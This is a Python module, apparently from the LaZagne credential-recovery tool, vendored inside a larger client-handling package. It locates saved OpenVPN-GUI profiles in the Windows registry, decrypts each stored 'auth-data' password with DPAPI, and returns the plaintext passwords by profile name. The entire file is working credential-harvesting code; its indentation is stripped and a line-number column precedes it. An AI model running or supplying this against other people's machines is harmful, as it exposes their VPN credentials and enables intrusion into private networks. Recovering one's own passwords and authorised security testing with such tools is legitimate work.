1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
|
try:
import _winreg as winreg
except ImportError:
import winreg
from foreign.client_handling.lazagne.config.winstructure import *
from foreign.client_handling.lazagne.config.module_info import ModuleInfo
from foreign.client_handling.lazagne.config.winstructure import Win32CryptUnprotectData
from foreign.client_handling.lazagne.config.constant import constant
class OpenVPN(ModuleInfo):
def __init__(self):
ModuleInfo.__init__(self, name='openvpn', category='sysadmin', registry_used=True, winapi_used=True)
def check_openvpn_installed(self):
try:
key = OpenKey(HKEY_CURRENT_USER, 'Software\\OpenVPN-GUI\\Configs')
return key
except Exception as e:
self.debug(str(e))
return False
def decrypt_password(self, encrypted_password, entropy):
return Win32CryptUnprotectData(encrypted_password,
entropy=entropy,
is_current_user=constant.is_current_user,
user_dpapi=constant.user_dpapi)
def get_credentials(self, key):
pwd_found = []
num_profiles = winreg.QueryInfoKey(key)[0]
for n in range(num_profiles):
name_skey = winreg.EnumKey(key, n)
skey = OpenKey(key, name_skey)
values = {'Profile': name_skey}
try:
encrypted_password = winreg.QueryValueEx(skey, "auth-data")[0]
entropy = winreg.QueryValueEx(skey, "entropy")[0][:-1]
password = self.decrypt_password(encrypted_password, entropy)
values['Password'] = password.decode('utf16')
except Exception as e:
self.debug(str(e))
pwd_found.append(values)
winreg.CloseKey(skey)
winreg.CloseKey(key)
return pwd_found
def run(self):
openvpn_key = self.check_openvpn_installed()
if openvpn_key:
results = self.get_credentials(openvpn_key)
if results:
return results
|
